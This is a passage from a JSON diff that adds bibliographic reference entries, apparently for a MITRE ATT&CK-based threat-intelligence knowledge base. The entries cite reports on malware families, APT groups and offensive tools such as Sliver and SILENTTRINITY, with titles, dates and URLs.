Reinfection Vector" + }, + "related": [], + "uuid": "b8b3f360-e14c-49ea-a4e5-8d6d9727e731", + "value": "Magento" + }, + { + "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020.", + "meta": { + "date_accessed": "2020-05-29T00:00:00Z", + "date_published": "2019-06-12T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/" + ], + "source": "MITRE", + "title": "Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns" + }, + "related": [], + "uuid": "e664a0c7-154f-449e-904d-335be1b72b29", + "value": "Trend Micro TA505 June 2019" + }, + { + "description": "LOLBAS. (2021, January 6). Shimgvw.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-01-06T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Shimgvw/" + ], + "source": "Tidal Cyber", + "title": "Shimgvw.dll" + }, + "related": [], + "uuid": "aba1cc57-ac30-400f-8b02-db7bf279dfb6", + "value": "Shimgvw.dll - LOLBAS Project" + }, + { + "description": "FireEye. (2021, May 11). Shining a Light on DARKSIDE Ransomware Operations. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2021-05-11T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html" + ], + "source": "MITRE", + "title": "Shining a Light on DARKSIDE Ransomware Operations" + }, + "related": [], + "uuid": "6ac6acc2-9fea-4887-99b2-9988991b47b6", + "value": "FireEye Shining A Light on DARKSIDE May 2021" + }, + { + "description": "Fabian Marquardt. (2023, August 25). Shining some light on the DarkGate loader. Retrieved October 20, 2023.", + "meta": { + "date_accessed": "2023-10-20T00:00:00Z", + "date_published": "2023-08-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://github.security.telekom.com/2023/08/darkgate-loader.html" + ], + "source": "Tidal Cyber", + "title": "Shining some light on the DarkGate loader" + }, + "related": [], + "uuid": "1cb60362-f73e-49e6-b0ee-e8f67a25c058", + "value": "Telekom Security DarkGate August 25 2023" + }, + { + "description": "Inman, R. and Gurney, P. (2022, June 6). Shining the Light on Black Basta. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "date_published": "2022-06-06T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/" + ], + "source": "MITRE", + "title": "Shining the Light on Black Basta" + }, + "related": [], + "uuid": "b5f91f77-b102-5812-a79f-69b254487da8", + "value": "NCC Group Black Basta June 2022" + }, + { + "description": "Merritt, E.. (2015, November 16). Shining the Spotlight on Cherry Picker PoS Malware. Retrieved April 20, 2016.", + "meta": { + "date_accessed": "2016-04-20T00:00:00Z", + "date_published": "2015-11-16T00:00:00Z", + "refs": [ + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/" + ], + "source": "MITRE", + "title": "Shining the Spotlight on Cherry Picker PoS Malware" + }, + "related": [], + "uuid": "e09f639e-bdd3-4e88-8032-f665e347272b", + "value": "Trustwave Cherry Picker" + }, + { + "description": "Jaron Bradley. (2021, April 26). Shlayer malware abusing Gatekeeper bypass on macOS. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2021-04-26T00:00:00Z", + "refs": [ + "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/" + ], + "source": "MITRE", + "title": "Shlayer malware abusing Gatekeeper bypass on macOS" + }, + "related": [], + "uuid": "9ece29ee-c4e9-4a30-9958-88b114a417ce", + "value": "Shlayer jamf gatekeeper bypass 2021" + }, + { + "description": "Shodan. (n.d.). Shodan. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "refs": [ + "https://shodan.io" + ], + "source": "MITRE", + "title": "Shodan" + }, + "related": [], + "uuid": "a142aceb-3ef5-4231-8771-bb3b2dae9acd", + "value": "Shodan" + }, + { + "description": "Elastic. (n.d.). Shortcut File Written or Modified for Persistence. Retrieved June 1, 2022.", + "meta": { + "date_accessed": "2022-06-01T00:00:00Z", + "refs": [ + "https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence" + ], + "source": "MITRE", + "title": "Shortcut File Written or Modified for Persistence" + }, + "related": [], + "uuid": "4a12e927-0511-40b1-85f3-869ffc452c2e", + "value": "Shortcut for Persistence" + }, + { + "description": "Unprotect Project. (2019, March 18). Shortcut Hiding. Retrieved October 3, 2023.", + "meta": { + "date_accessed": "2023-10-03T00:00:00Z", + "date_published": "2019-03-18T00:00:00Z", + "refs": [ + "https://unprotect.it/technique/shortcut-hiding/" + ], + "source": "MITRE", + "title": "Shortcut Hiding" + }, + "related": [], + "uuid": "b62d40bc-2782-538a-8913-429908c6a2ee", + "value": "Unprotect Shortcut" + }, + { + "description": "AVG. (n.d.). Should You Shut Down, Sleep or Hibernate Your PC or Mac Laptop?. Retrieved June 8, 2023.", + "meta": { + "date_accessed": "2023-06-08T00:00:00Z", + "refs": [ + "https://www.avg.com/en/signal/should-you-shut-down-sleep-or-hibernate-your-pc-or-mac-laptop" + ], + "source": "MITRE", + "title": "Should You Shut Down, Sleep or Hibernate Your PC or Mac Laptop?" + }, + "related": [], + "uuid": "e9064801-0297-51d0-9089-db58f4811a9f", + "value": "Sleep, shut down, hibernate" + }, + { + "description": "Cisco. (2023, March 6). show clock detail - Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.", + "meta": { + "date_accessed": "2022-07-13T00:00:00Z", + "date_published": "2023-03-06T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896741674" + ], + "source": "MITRE", + "title": "show clock detail - Cisco IOS Security Command Reference: Commands S to Z" + }, + "related": [], + "uuid": "a2215813-31b0-5624-92d8-479e7bd1a30b", + "value": "show_clock_detail_cisco_cmd" + }, + { + "description": "Cisco. (2022, August 16). show processes - . Retrieved July 13, 2022.", + "meta": { + "date_accessed": "2022-07-13T00:00:00Z", + "date_published": "2022-08-16T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760" + ], + "source": "MITRE", + "title": "show processes -" + }, + "related": [], + "uuid": "944e529b-5e8a-54a1-b205-71dcb7dd304f", + "value": "show_processes_cisco_cmd" + }, + { + "description": "Cisco. (2022, August 16). show running-config - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.", + "meta": { + "date_accessed": "2022-07-13T00:00:00Z", + "date_published": "2022-08-16T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_protocols_through_showmon.html#wp2760878733" + ], + "source": "MITRE", + "title": "show running-config - Cisco IOS Configuration Fundamentals Command Reference" + }, + "related": [], + "uuid": "5a68a45a-a53e-5d73-a82a-0cc951071aef", + "value": "show_run_config_cmd_cisco" + }, + { + "description": "Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.", + "meta": { + "date_accessed": "2022-02-17T00:00:00Z", + "date_published": "2022-01-31T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine" + ], + "source": "MITRE, Tidal Cyber", + "title": "Shuckworm Continues Cyber-Espionage Attacks Against Ukraine" + }, + "related": [], + "uuid": "3abb9cfb-8927-4447-b904-6ed071787bef", + "value": "Symantec Shuckworm January 2022" + }, + { + "description": "Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2017-10-15T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown" + ], + "source": "MITRE", + "title": "Shutdown" + }, + "related": [], + "uuid": "c587f021-596a-4e63-ac51-afa2793a859d", + "value": "Microsoft Shutdown Oct 2017" + }, + { + "description": "Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022.", + "meta": { + "date_accessed": "2022-06-13T00:00:00Z", + "date_published": "2021-12-02T00:00:00Z", + "refs": [ + "https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure" + ], + "source": "MITRE", + "title": "SideCopy APT: Connecting lures victims, payloads to infrastructure" + }, + "related": [], + "uuid": "466569a7-1ef8-4824-bd9c-d25301184ea4", + "value": "MalwareBytes SideCopy Dec 2021" + }, + { + "description": "Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021.", + "meta": { + "date_accessed": "2021-01-29T00:00:00Z", + "date_published": "2020-04-20T00:00:00Z", + "refs": [ + "https://www.rewterz.com/threats/sidewinder-apt-group-campaign-analysis" + ], + "source": "MITRE", + "title": "Sidewinder APT Group Campaign Analysis" + }, + "related": [], + "uuid": "e1cecdab-d6d1-47c6-a942-3f3329e5d98d", + "value": "Rewterz Sidewinder APT April 2020" + }, + { + "description": "Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021.", + "meta": { + "date_accessed": "2021-01-29T00:00:00Z", + "date_published": "2020-09-26T00:00:00Z", + "refs": [ + "https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/" + ], + "source": "MITRE", + "title": "SideWinder APT Targets with futuristic Tactics and Techniques" + }, + "related": [], + "uuid": "25d8d6df-d3b9-4f57-bce0-d5285660e746", + "value": "Cyble Sidewinder September 2020" + }, + { + "description": "Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.", + "meta": { + "date_accessed": "2018-04-03T00:00:00Z", + "date_published": "2017-05-22T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/sysinternals/downloads/sigcheck" + ], + "source": "MITRE", + "title": "Sigcheck" + }, + "related": [], + "uuid": "7f3a0f44-03d4-4b02-9d9d-74e8ee9eede8", + "value": "Microsoft Sigcheck May 2017" + }, + { + "description": "Linux man-pages. (2023, April 3). signal(7). Retrieved August 30, 2023.", + "meta": { + "date_accessed": "2023-08-30T00:00:00Z", + "date_published": "2023-04-03T00:00:00Z", + "refs": [ + "https://man7.org/linux/man-pages/man7/signal.7.html" + ], + "source": "MITRE", + "title": "signal(7)" + }, + "related": [], + "uuid": "63483956-fa3e-52da-a834-b3b762c4e84e", + "value": "Linux Signal Man" + }, + { + "description": "Brod. (2013, July 15). Signed Mac Malware Using Right-to-Left Override Trick. Retrieved July 17, 2017.", + "meta": { + "date_accessed": "2017-07-17T00:00:00Z", + "date_published": "2013-07-15T00:00:00Z", + "refs": [ + "https://www.f-secure.com/weblog/archives/00002576.html" + ], + "source": "MITRE", + "title": "Signed Mac Malware Using Right-to-Left Override Trick" + }, + "related": [], + "uuid": "07e484cb-7e72-4938-a029-f9904d751777", + "value": "f-secure janicab" + }, + { + "description": "Group-IB. (2019, August). Silence 2.0: Going Global. Retrieved May 5, 2020.", + "meta": { + "date_accessed": "2020-05-05T00:00:00Z", + "date_published": "2019-08-01T00:00:00Z", + "refs": [ + "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf" + ], + "source": "MITRE", + "title": "Silence 2.0: Going Global" + }, + "related": [], + "uuid": "2c314eb6-767f-45b9-8a60-dba11e06afd8", + "value": "Group IB Silence Aug 2019" + }, + { + "description": "GReAT. (2017, November 1). Silence – a new Trojan attacking financial organizations. Retrieved May 24, 2019.", + "meta": { + "date_accessed": "2019-05-24T00:00:00Z", + "date_published": "2017-11-01T00:00:00Z", + "refs": [ + "https://securelist.com/the-silence/83009/" + ], + "source": "MITRE", + "title": "Silence – a new Trojan attacking financial organizations" + }, + "related": [], + "uuid": "004a8877-7e57-48ad-a6ce-b9ad8577cc68", + "value": "SecureList Silence Nov 2017" + }, + { + "description": "Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.", + "meta": { + "date_accessed": "2019-05-24T00:00:00Z", + "date_published": "2019-01-20T00:00:00Z", + "refs": [ + "https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/" + ], + "source": "MITRE", + "title": "Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis" + }, + "related": [], + "uuid": "c328d6d3-5e8b-45a6-8487-eecd7e8cbf7e", + "value": "Cyber Forensicator Silence Jan 2019" + }, + { + "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020.", + "meta": { + "date_accessed": "2020-05-05T00:00:00Z", + "date_published": "2018-09-01T00:00:00Z", + "refs": [ + "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf" + ], + "source": "MITRE", + "title": "Silence: Moving Into the Darkside" + }, + "related": [], + "uuid": "10d41d2e-44be-41a7-84c1-b8f39689cb93", + "value": "Group IB Silence Sept 2018" + }, + { + "description": "CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2021-09-29T00:00:00Z", + "refs": [ + "https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Silent Chollima Adversary Profile" + }, + "related": [], + "uuid": "835283b5-af3b-4baf-805e-da8ebbe8b5d2", + "value": "CrowdStrike Silent Chollima Adversary September 2021" + }, + { + "description": "Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.", + "meta": { + "date_accessed": "2021-02-03T00:00:00Z", + "date_published": "2020-10-14T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/" + ], + "source": "MITRE", + "title": "Silent Librarian APT right on schedule for 20/21 academic year" + }, + "related": [], + "uuid": "9bb8ddd0-a8ec-459b-9983-79ccf46297ca", + "value": "Malwarebytes Silent Librarian October 2020" + }, + { + "description": "Hassold, Crane. (2018, March 26). Silent Librarian: More to the Story of the Iranian Mabna Institute Indictment. Retrieved February 3, 2021.", + "meta": { + "date_accessed": "2021-02-03T00:00:00Z", + "date_published": "2018-03-26T00:00:00Z", + "refs": [ + "https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment" + ], + "source": "MITRE, Tidal Cyber", + "title": "Silent Librarian: More to the Story of the Iranian Mabna Institute Indictment" + }, + "related": [], + "uuid": "d79d0510-4d49-464d-8074-daedd186f1c1", + "value": "Phish Labs Silent Librarian" + }, + { + "description": "Salvati, M. (2019, August 6). SILENTTRINITY Modules. Retrieved March 24, 2022.", + "meta": { + "date_accessed": "2022-03-24T00:00:00Z", + "date_published": "2019-08-06T00:00:00Z", + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY/tree/master/silenttrinity/core/teamserver/modules/boo" + ], + "source": "MITRE", + "title": "SILENTTRINITY Modules" + }, + "related": [], + "uuid": "df9252e6-2727-4b39-a5f8-9f01c85aae9d", + "value": "GitHub SILENTTRINITY Modules July 2019" + }, + { + "description": "Prizmant, D. (2021, June 7). Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments. Retrieved June 9, 2021.", + "meta": { + "date_accessed": "2021-06-09T00:00:00Z", + "date_published": "2021-06-07T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/siloscape/" + ], + "source": "MITRE", + "title": "Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments" + }, + "related": [], + "uuid": "4be128a7-97b8-48fa-8a52-a53c1e56f086", + "value": "Unit 42 Siloscape Jun 2021" + }, + { + "description": "Renals, P., Conant, S. (2016). SILVERTERRIER: The Next Evolution in Nigerian Cybercrime. Retrieved November 13, 2018.", + "meta": { + "date_accessed": "2018-11-13T00:00:00Z", + "date_published": "2016-01-01T00:00:00Z", + "refs": [ + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "SILVERTERRIER: The Next Evolution in Nigerian Cybercrime" + }, + "related": [], + "uuid": "a6ba79ca-7d4a-48d3-aae3-ee766770f83b", + "value": "Unit42 SilverTerrier 2016" + }, + { + "description": "Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.", + "meta": { + "date_accessed": "2018-11-13T00:00:00Z", + "date_published": "2016-01-01T00:00:00Z", + "refs": [ + "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise" + ], + "source": "MITRE, Tidal Cyber", + "title": "SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE" + }, + "related": [], + "uuid": "59630d6e-d034-4788-b418-a72bafefe54e", + "value": "Unit42 SilverTerrier 2018" + }, + { + "description": "Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020.", + "meta": { + "date_accessed": "2020-03-26T00:00:00Z", + "date_published": "2012-12-18T00:00:00Z", + "refs": [ + "https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/" + ], + "source": "MITRE", + "title": "Simple code injection using DYLD_INSERT_LIBRARIES" + }, + "related": [], + "uuid": "54fcbc49-f4e3-48a4-9d67-52ca08b322b2", + "value": "Timac DYLD_INSERT_LIBRARIES" + }, + { + "description": "Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced Attack. Retrieved June 2, 2023.", + "meta": { + "date_accessed": "2023-06-02T00:00:00Z", + "date_published": "2023-05-16T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/sim-swapping-abuse-azure-serial" + ], + "source": "MITRE", + "title": "SIM Swapping and Abuse of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced Attack" + }, + "related": [], + "uuid": "c596a0e0-6e9c-52e4-b1bb-9c0542f960f2", + "value": "SIM Swapping and Abuse of the Microsoft Azure Serial Console" + }, + { + "description": "Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018.", + "meta": { + "date_accessed": "2018-01-31T00:00:00Z", + "date_published": "2008-07-11T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/" + ], + "source": "MITRE", + "title": "SIP’s (Subject Interface Package) and Authenticode" + }, + "related": [], + "uuid": "ac37f167-3ae9-437b-9215-c30c1ab4e249", + "value": "EduardosBlog SIPs July 2008" + }, + { + "description": "Andy. (2018, May 12). ‘Anonymous’ Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW). Retrieved April 19, 2019.", + "meta": { + "date_accessed": "2019-04-19T00:00:00Z", + "refs": [ + "https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/" + ], + "source": "MITRE", + "title": "Site to Protest Web-Blocking (NSFW)" + }, + "related": [], + "uuid": "ca63ccd4-8c81-4de6-8eb4-06a6c68ce4d3", + "value": "Anonymous Hackers Deface Russian Govt Site" + }, + { + "description": "Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.", + "meta": { + "date_accessed": "2019-04-08T00:00:00Z", + "date_published": "2015-01-12T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/skeleton-key-malware-analysis" + ], + "source": "MITRE", + "title": "Skeleton Key Malware Analysis" + }, + "related": [], + "uuid": "cea9ce77-7641-4086-b92f-a4c3ad94a49c", + "value": "Dell Skeleton" + }, + { + "description": "Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018.", + "meta": { + "date_accessed": "2018-04-06T00:00:00Z", + "date_published": "2011-09-01T00:00:00Z", + "refs": [ + "https://www.commandfive.com/papers/C5_APT_SKHack.pdf" + ], + "source": "MITRE", + "title": "SK Hack by an Advanced Persistent Threat" + }, + "related": [], + "uuid": "ccca927e-fa03-4eba-b631-9989804a1f3c", + "value": "Command Five SK 2011" + }, + { + "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.", + "meta": { + "date_accessed": "2020-06-04T00:00:00Z", + "date_published": "2019-09-19T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/" + ], + "source": "MITRE", + "title": "Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload" + }, + "related": [], + "uuid": "53291621-f0ad-4cb7-af08-78b96eb67168", + "value": "Trend Micro Skidmap" + }, + { + "description": "Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2016-04-28T00:00:00Z", + "refs": [ + "https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/" + ], + "source": "MITRE", + "title": "Slack bot token leakage exposing business critical information" + }, + "related": [], + "uuid": "46c40ed4-5a15-4b38-b625-bebc569dbf69", + "value": "Detectify Slack Tokens" + }, + { + "description": "BishopFox. (n.d.). Sliver. Retrieved September 15, 2021.", + "meta": { + "date_accessed": "2021-09-15T00:00:00Z", + "refs": [ + "https://github.com/BishopFox/sliver/" + ], + "source": "MITRE", + "title": "Sliver" + }, + "related": [], + "uuid": "f706839a-c6e7-469b-a0c0-02c0d55eb4f6", + "value": "GitHub Sliver C2" + }, + { + "description": "BishopFox. (n.d.). Sliver DNS C2 . Retrieved September 15, 2021.", + "meta": { + "date_accessed": "2021-09-15T00:00:00Z", + "refs": [ + "https://github.com/BishopFox/sliver/wiki/DNS-C2" + ], + "source": "MITRE", + "title": "Sliver DNS C2" + }, + "related": [], + "uuid": "41c1ac3e-d03a-4e09-aebe-a8c191236e7e", + "value": "GitHub Sliver C2 DNS" + }, + { + "description": "BishopFox. (n.d.). Sliver Download. Retrieved September 16, 2021.", + "meta": { + "date_accessed": "2021-09-16T00:00:00Z", + "refs": [ + "https://github.com/BishopFox/sliver/blob/7489c69962b52b09ed377d73d142266564845297/client/command/filesystem/download.go" + ], + "source": "MITRE", + "title": "Sliver Download" + }, + "related": [], + "uuid": "f9f6468f-6115-4753-a1ff-3658e410f964", + "value": "GitHub Sliver Download" + }, + { + "description": "BishopFox. (2021, August 18). Sliver Filesystem. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2021-08-18T00:00:00Z", + "refs": [ + "https://github.com/BishopFox/sliver/tree/master/client/command/filesystem" + ], + "source": "MITRE", + "title": "Sliver Filesystem" + }, + "related": [], + "uuid": "820beaff-a0d5-4017-9a9c-6fbd7874b585", + "value": "GitHub Sliver File System August 2021" + }, + { + "description": "BishopFox. (n.d.). Sliver HTTP(S) C2. Retrieved September 16, 2021.", + "meta": { + "date_accessed": "2021-09-16T00:00:00Z", + "refs": [ + "https://github.com/BishopFox/sliver/wiki/HTTP(S)-C2" + ], + "source": "MITRE", + "title": "Sliver HTTP(S) C2" + }, + "related": [], + "uuid": "0194a86d-c7bf-4115-ab45-4c67fcfdb2a1", + "value": "GitHub Sliver HTTP" + }, + { + "description": "BishopFox. (n.d.). Sliver Ifconfig. Retrieved September 16, 2021.", + "meta": { + "date_accessed": "2021-09-16T00:00:00Z", + "refs": [ + "https://github.com/BishopFox/sliver/blob/ea329226636ab8e470086a17f13aa8d330baad22/client/command/network/ifconfig.go" + ], + "source": "MITRE", + "title": "Sliver Ifconfig" + }, + "related": [], + "uuid": "e9783116-144f-49e9-a3c5-28bf3ff9c654", + "value": "GitHub Sliver Ifconfig" + }, + { + "description": "BishopFox. (n.d.). Sliver Netstat. Retrieved September 16, 2021.", + "meta": { + "date_accessed": "2021-09-16T00:00:00Z", + "refs": [ + "https://github.com/BishopFox/sliver/tree/58a56a077f0813bb312f9fa4df7453b510c3a73b/implant/sliver/netstat" + ], + "source": "MITRE", + "title": "Sliver Netstat" + }, + "related": [], + "uuid": "37ef7619-8157-4522-aea7-779d75464029", + "value": "GitHub Sliver Netstat" + }, + { + "description": "BishopFox. (n.d.). Sliver Screenshot. Retrieved September 16, 2021.", + "meta": { + "date_accessed": "2021-09-16T00:00:00Z", + "refs": [ + "https://github.com/BishopFox/sliver/blob/master/implant/sliver/screen/screenshot_windows.go" + ], + "source": "MITRE", + "title": "Sliver Screenshot" + }, + "related": [], + "uuid": "0417572e-d1c7-4db5-8644-5b94c79cc14d", + "value": "GitHub Sliver Screen" + }, + { + "description": "BishopFox. (n.d.). Sliver Transport Encryption. Retrieved September 16, 2021.", + "meta": { + "date_accessed": "2021-09-16T00:00:00Z", + "refs": [ + "https://github.com/BishopFox/sliver/wiki/Transport-Encryption" + ], + "source": "MITRE", + "title": "Sliver Transport Encryption" + }, + "related": [], + "uuid": "b33a9d44-1468-4b3e-8d27-9c48c81bec74", + "value": "GitHub Sliver Encryption" + }, + { + "description": "BishopFox. (n.d.). Sliver Upload. Retrieved September 16, 2021.", + "meta": { + "date_accessed": "2021-09-16T00:00:00Z", + "refs": [ + "https://github.com/BishopFox/sliver/blob/ea329226636ab8e470086a17f13aa8d330baad22/client/command/filesystem/upload.go" + ], + "source": "MITRE", + "title": "Sliver Upload" + }, + "related": [], + "uuid": "96e6e207-bf8b-4a3e-9a92-779e8bb6bb67", + "value": "GitHub Sliver Upload" + }, + { + "description": "Cimpanu, C. (2018, September 13). Sly malware author hides cryptomining botnet behind ever-shifting proxy service. Retrieved September 15, 2020.", + "meta": { + "date_accessed": "2020-09-15T00:00:00Z", + "date_published": "2018-09-13T00:00:00Z", + "refs": [ + "https://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-proxy-service/" + ], + "source": "MITRE", + "title": "Sly malware author hides cryptomining botnet behind ever-shifting proxy service" + }, + "related": [], + "uuid": "3edb88be-2ca6-4925-ba2e-a5a4ac5f9ab0", + "value": "Zdnet Ngrok September 2018" + }, + { + "description": "NCSC GCHQ. (2022, January 27). Small Sieve Malware Analysis Report. Retrieved August 22, 2022.", + "meta": { + "date_accessed": "2022-08-22T00:00:00Z", + "date_published": "2022-01-27T00:00:00Z", + "refs": [ + "https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf" + ], + "source": "MITRE", + "title": "Small Sieve Malware Analysis Report" + }, + "related": [], + "uuid": "0edb8946-be38-45f5-a27c-bdbebc383d72", + "value": "NCSC GCHQ Small Sieve Jan 2022" + }, + { + "description": "smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018.", + "meta": { + "date_accessed": "2018-10-02T00:00:00Z", + "refs": [ + "https://www.smartmontools.org/" + ], + "source": "MITRE", + "title": "smartmontools" + }, + "related": [], + "uuid": "efae8de6-1b8d-47c0-b7a0-e3d0c227a14c", + "value": "SmartMontools" + }, + { + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020.", + "meta": { + "date_accessed": "2020-07-17T00:00:00Z", + "date_published": "2018-09-08T00:00:00Z", + "refs": [ + "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference" + ], + "source": "MITRE", + "title": "SMB: Command Reference" + }, + "related": [], + "uuid": "a6e1e3b4-1b69-43b7-afbe-aedb812c5778", + "value": "CME Github September 2018" + }, + { + "description": "US-CERT. (2017, March 16). SMB Security Best Practices. Retrieved December 21, 2017.", + "meta": { + "date_accessed": "2017-12-21T00:00:00Z", + "date_published": "2017-03-16T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices" + ], + "source": "MITRE", + "title": "SMB Security Best Practices" + }, + "related": [], + "uuid": "710d2292-c693-4857-9196-397449061e76", + "value": "US-CERT SMB Security" + }, + { + "description": "Tim Schroeder. (2013, April 21). SMLoginItemSetEnabled Demystified. Retrieved October 5, 2021.", + "meta": { + "date_accessed": "2021-10-05T00:00:00Z", + "date_published": "2013-04-21T00:00:00Z", + "refs": [ + "https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/" + ], + "source": "MITRE", + "title": "SMLoginItemSetEnabled Demystified" + }, + "related": [], + "uuid": "ad14bad2-95c8-49b0-9777-e464fc8359a0", + "value": "SMLoginItemSetEnabled Schroeder 2013" + }, + { + "description": "Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018.", + "meta": { + "date_accessed": "2018-03-20T00:00:00Z", + "date_published": "2016-09-12T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/" + ], + "source": "MITRE", + "title": "Smoke Loader – downloader with a 